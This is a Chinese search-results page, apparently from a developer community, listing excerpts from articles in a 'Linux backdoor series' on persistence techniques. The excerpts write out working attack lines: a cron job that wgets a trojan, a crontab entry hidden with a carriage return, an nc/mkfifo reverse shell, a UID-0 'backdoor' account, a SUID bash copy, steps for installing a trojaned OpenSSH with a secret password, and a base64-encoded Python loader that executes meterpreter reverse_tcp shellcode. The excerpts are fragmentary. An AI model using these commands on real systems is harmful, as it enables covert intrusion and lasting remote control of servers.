展开

关键词

vim 后门 | Linux 后门系列

60320

alias后门 | Linux 后门系列

/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux %h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias 把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过 ,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。 后门 ?

1.1K30
  • 广告
    关闭

    老用户专属续费福利

    云服务器CVM、轻量应用服务器1.5折续费券等您来抽!

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    SSH Config 后门Linux 后门系列

    Ubuntu server 16.04 默认 /etc/ssh/ssh_config

    48030

    LD_PRELOAD 后门 | Linux 后门系列

    加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ? 设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ? 咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ? 成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ? 劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!

    2K20

    计划任务后门 | Linux 后门系列

    Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介 一会儿再说吧(Linux上万物皆文件,肯定是文件啦!) 3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用 0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab 这种利用方法巧妙在使用了windows中的 \r( Linux 中显示为M),导致显示截断,从而隐藏我们真实的计划任务,我们使用crontab -e 可以看到真实的计划任务如下: ?

    1.5K40

    MOTD 后门引发的思考 | Linux 后门系列

    最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day ,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多 root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #! - Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to 是如何使策略配置生效的 参考 Linux Source Command with Examples https://linuxhint.com/linux-source-command-examples

    26000

    mknod ​| Linux 后门系列

    perl 和 Python 在做反弹shell基本差不多,Python 那一节有点讲的太多了,大家可以对比一下参数,照着Python的思路移到 perl 上,我...

    23510

    Linux安装后门程序

    ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门 : 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz # tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" -> #test1234位后门连接密码 5、编译安装: # . ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门

    588110

    Linux后门整理合集

    UnixBash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。 nc -vv -lp 53 Linux/Unix 藏文件和文件夹 Linux/Unix 下想藏 Webshell 或者后门什么的,可以利用一下隐藏文件夹和文件。 方法一 比如创建一个名字开头带 . 利用方法 useradd -o -u 0 backdoor Linux/Unix 修改文件时间戳 简介 Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用touch就可以了。 现在,做为一个普通用户,我们来启用这个后门: fw@dawg:~$ id uid=1000(fw) gid=1000(fw) groups=1000(fw) fw@dawg:~$ /.woot.woot 这个euid的意思是 effective user id 这里要特别注意的是,作为一个普通用户执行这个SUID shell时,一定要使用全路径。

    1.4K80

    权限维持之Linux后门

    在渗透过程中拿到目标权限只是开始,通常会留下后门以便再次访问(简称APT)。因此需要进行权限维持,隐藏后门。本文将对Linux下常见的权限维持后门技术进行解析,知己知彼百战不殆。 ">>/etc/passwd #Aalv…为第一行命令执行结果 2.设置suid权限位 原理:设置了suid权限位的文件在执行时具有该文件拥有者的权限,故我们可以在root权限时留一个bash文件后门 ,使得在低权限时能够通过该后门获得root权限 cp /bin/bash /tmp/test chmod 4755 /tmp/test #或者chmod u+s /tmp/test /tmp/test (不通操作系统文件不同) 4.写入SSH公钥 原理:Linux主机打开了SSH时默认也开启了密钥登陆,故写入ssh公钥,即可留下一条控制系统的路 ssh-keygen -t rsa #生成ssh密钥对 则会修改目录下root文件,也相当于crontab -e 还有许多其它执行计划任务的文件及相关文件 11.预加载动态链接库 原理:系统执行一些命令的时候,在真正执行其文件之前,会加载相应的动态链接库,但linux

    88120

    Linux渗透之Shellshock后门

    注入式攻击”也就是可以向 bash注入一段命令,从bash1.14到4.3都存在这样的漏洞; 漏洞编号:CVE-2014-6271 详细情况:Bash(GNU Bourne-Again Shell)是大多数Linux Bash其广泛的使用将意味全球至少 150 万的主机将受到影响,此外 Linux/Unix 世界内的安卓和苹果都难以幸免。

    55700

    nc 反弹shell ​| Linux 后门系列

    ---- 关于nc之前文章就已经讲过了,不过我发现不同 linux 的nc不太一样 ? 原理其实就是管道技术 参考文章: https://www.cnblogs.com/old-path-white-cloud/p/11685558.html 本来我对自己的Linux知识还是挺有信心的,不过最近研究了这些 Linux 后门之后发现我竟然对这些命令有些犹豫(其实就是学艺不精啦) 我对这个 rm -f /tmp/f 就十分不理解,实验之后我发现,没错,就是删除 /tmp/f 这个文件,没啥特殊的,就是怕mkfifo mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.38 5555 > /tmp/f ---- 本来我想如果加上 -k 选项是不是可以做一个持久后门

    96830

    linux通用链表

    Linux中设计了一种适合于各种类型数据域都可以使用的通用型链表: struct list_head { struct list_head *prev, *next; }; 摒弃掉数据域,只保留头尾指针 因此数据域是链表不可或缺的一部分,但是在实际使用中需要不同类型的数据域,因此也就限制了链表的通用Linux中在声明中抛弃了数据域,也就解决掉了这一问题。 原理 Linux使用链表的方法:使用时,自定义结构体包含数据域+链表结构体。即让内部链表成员与其他链表成员构建成双链表,实现遍历寻址,然后通过链表成员找到包含该成员的结构体首地址。 ? 「linux实现获取结构体首地址:」 #define list_entry(ptr, type, member) \ ((type *)((char *)(ptr)-(unsigned long)(&( 「通过上述方法, 可以通过任一结构体成员获取到该结构体的首地址」 其余操作 剩下的就是链表的通用操作:增、删、改、查。

    30820

    Linux 后门系列之 python3 反弹shell & 隐藏后门

    On Debian GNU/{Hurd,Linux} the default for both is /usr. 所以思路来了: 要保证我们后门的名字和模块的名字一样 我们的后门路径要优先被索引 最好名称能正常一点或者以 . 等特殊字符开头 按照这个思路,我们可以从 /usr/lib/python3.5/plat-x86_64-linux-gnu 目录开始搜索 ? 没想到 /usr/lib/python3.5/ 目录下还有一个跟这个文件名类似的文件,简直不要太好,我们看看文件内容,好决定怎么留后门,截取一小部分 ? ? 在 /usr/lib/python3.5/plat-x86_64-linux-gnu/ 创建 STYLE.py ?

    59120

    制作linux键盘记录后门

    我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围 使用场景 通过其他方式拿到shell,通过history、流量抓包、或者本地没有翻到密码的情况。

    41550

    Linux OpenSSH后门的添加与防范

    小编说:相对于Windows,Linux操作系统的密码较难获取。 不过很多Linux服务器配置了OpenSSH服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号和密码,甚至可以留下一个隐形的后门,达到长期控制Linux 很多入侵者在攻破一个Linux系统后,都会在系统中留下后门,用OpenSSH留后门是入侵者的惯用方式之一。 准备Linux虚拟机 准备Linux虚拟机Centos 6.4。 4. 查看SSH当前版本信息 目前网上支持的SSH后门版本为5.9以下。 在Linux终端分别执行如下文件备份命令。

    91130

    文件&目录小技巧 | Linux后门系列

    0x01 Linux 目录技巧 我们都知道 Windows 下文件和文件夹命名是有很多规则和限制的,但是可以通过一些程序来绕过限制,今天我们来看看 Linux 有哪些有趣的规则 参考 https:/ 在 Linux 中 . 和 .. 目录是默认的,代表着本级和上级 ? 所以我们在创建 . 和 .. 的时候会提示文件夹已经存在了,所以我尝试了一下三个点,成功了 所以说 . 星号在 Linux 中通配符的意思,但是我们还是可以创建 * 号这个目录的,前提是目录是空的,不然目录会冲突,具体如下: ? ^ 这个符号在规则表达式中,代表行的 “开头” 位置 ? 在 Linux 中 . 和 .. 目录是默认的目录,所以是无法创建为文件的,三个点就不受限制了 ? ? 创建几乎不受限制 ? Linux万物皆文件

    36630

    Linux常见的持久化后门汇总

    0x00:前言 持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用 Linux 0x01:SSH 一、ssh软连接 SSH软连接后门的原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去 /github.com/gaffe23/linux-inject/ ? 衍生的另外一个技巧 "linux一种无文件后门技巧" 文章参考链接 https://kevien.github.io/2018/02/20/linux%E4%B8%80%E7%A7%8D%E6%97% A0%E6%96%87%E4%BB%B6%E5%90%8E%E9%97%A8%E6%8A%80%E5%B7%A7%28%E8%AF%91%E6%96%87%29/ 0x06:动态链接库后门Linux

    32730

    不落地反弹meterpreter | Linux后门系列

    之前一直看大家在做分离免杀,但大部分都是windows上的,既然学习Linux,就搞一个Linux版本的一句话反弹meterpreter,借用分离免杀的思想:用 Python3 执行 shellcode payload : linux/x64/meterpreter/reverse_tcp 生成shellcode use payload/linux/x64/meterpreter/reverse_tcp Return pointer to shell code function in executable memory return function buf = "shellcode" # linux xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6" # linux aW1wb3J0IGN0eXBlcywgbW1hcAoKZGVmIGNyZWF0ZV9zaGVsbGNvZGVfZnVuY3Rpb24gKHNoZWxsY29kZV9ieXRlcyk6CgogICAgIyBBbGxvY2F0ZSBtZW1vcnkgd2l0aCBhIFJXWCBwcml2YXRlIGFub255bW91cyBtbWFwCiAgICBleGVjX21lbSA9IG1tYXAubW1hcCgtMSwgbGVuKHNoZWxsY29kZV9ieXRlcyksCiAgICAgICAgICAgICAgICAgICAgICAgICBwcm90ID0gbW1hcC5QUk9UX1JFQUQgfCBtbWFwLlBST1RfV1JJVEUgfCBtbWFwLlBST1RfRVhFQywKICAgICAgICAgICAgICAgICAgICAgICAgIGZsYWdzID0gbW1hcC5NQVBfQU5PTllNT1VTIHwgbW1hcC5NQVBfUFJJVkFURSkKCiAgICAjIENvcHkgc2hlbGxjb2RlIGZyb20gYnl0ZXMgb2JqZWN0IHRvIGV4ZWN1dGFibGUgbWVtb3J5CiAgICBleGVjX21lbS53cml0ZShzaGVsbGNvZGVfYnl0ZXMpCgogICAgIyBDYXN0IHRoZSBtZW1vcnkgdG8gYSBDIGZ1bmN0aW9uIG9iamVjdAogICAgY3R5cGVzX2J1ZmZlciA9IGN0eXBlcy5jX2ludC5mcm9tX2J1ZmZlcihleGVjX21lbSkKICAgIGZ1bmN0aW9uID0gY3R5cGVzLkNGVU5DVFlQRSggY3R5cGVzLmNfaW50NjQgKShjdHlwZXMuYWRkcmVzc29mKGN0eXBlc19idWZmZXIpKQogICAgZnVuY3Rpb24uX2F2b2lkX2djX2Zvcl9tbWFwID0gZXhlY19tZW0KCiAgICAjIFJldHVybiBwb2ludGVyIHRvIHNoZWxsIGNvZGUgZnVuY3Rpb24gaW4gZXhlY3V0YWJsZSBtZW1vcnkKICAgIHJldHVybiBmdW5jdGlvbgoKYnVmID0gYiJceDQ4XHgzMVx4ZmZceDZhXHgwOVx4NThceDk5XHhiNlx4MTBceDQ4XHg4OVx4ZDZceDRkXHgzMVx4YzlceDZhXHgyMlx4NDFceDVhXHhiMlx4MDdceDBmXHgwNVx4NDhceDg1XHhjMFx4NzhceDUxXHg2YVx4MGFceDQxXHg1OVx4NTBceDZhXHgyOVx4NThceDk5XHg2YVx4MDJceDVmXHg2YVx4MDFceDVlXHgwZlx4MDVceDQ4XHg4NVx4YzBceDc4XHgzYlx4NDhceDk3XHg0OFx4YjlceDAyXHgwMFx4MTVceGIzXHhjMFx4YThceDAxXHgyNlx4NTFceDQ4XHg4OVx4ZTZceDZhXHgxMFx4NWFceDZhXHgyYVx4NThceDBmXHgwNVx4NTlceDQ4XHg4NVx4YzBceDc5XHgyNVx4NDlceGZmXHhjOVx4NzRceDE4XHg1N1x4NmFceDIzXHg1OFx4NmFceDAwXHg2YVx4MDVceDQ4XHg4OVx4ZTdceDQ4XHgzMVx4ZjZceDBmXHgwNVx4NTlceDU5XHg1Zlx4NDhceDg1XHhjMFx4NzlceGM3XHg2YVx4M2NceDU4XHg2YVx4MDFceDVmXHgwZlx4MDVceDVlXHg2YVx4N2VceDVhXHgwZlx4MDVceDQ4XHg4NVx4YzBceDc4XHhlZFx4ZmZceGU2IgoKIyBsaW51eCBtYWNoaW5lIGNvZGUKc2hlbGxjb2RlID0gYnVmCgojIENyZWF0ZSBhIHBvaW50ZXIgdG8gb3VyIHNoZWxsIGNvZGUgYW5kIGV4ZWN1dGUgaXQgd2l0aCBubyBwYXJhbWV0ZXJzCmNyZWF0ZV9zaGVsbGNvZGVfZnVuY3Rpb24oc2hlbGxjb2RlKSgp'))) 监听+执行 攻击机监听 use exploit/multi/handler set payload linux

    64630

    Linux常见的持久化后门汇总

    0x00:前言 持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用 Linux 0x01:SSH 一、ssh软连接 SSH软连接后门的原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去 /github.com/gaffe23/linux-inject/ ? 衍生的另外一个技巧 "linux一种无文件后门技巧" 文章参考链接 https://kevien.github.io/2018/02/20/linux%E4%B8%80%E7%A7%8D%E6%97% A0%E6%96%87%E4%BB%B6%E5%90%8E%E9%97%A8%E6%8A%80%E5%B7%A7%28%E8%AF%91%E6%96%87%29/ 0x06:动态链接库后门Linux

    1.8K30

    相关产品

    • 通用文字识别

      通用文字识别

      通用文字识别(General OCR)提供通用印刷体识别、通用印刷体识别(高精度版)、通用印刷体识别(高速版)、通用手写体识别、英文识别等多种服务,支持将图片上的文字内容,智能识别为可编辑的文本,可应用于随手拍扫描、纸质文档电子化、电商广告审核、智能翻译等场景,大幅提升信息处理效率。

    相关资讯

    热门标签

    扫码关注腾讯云开发者

    领取腾讯云代金券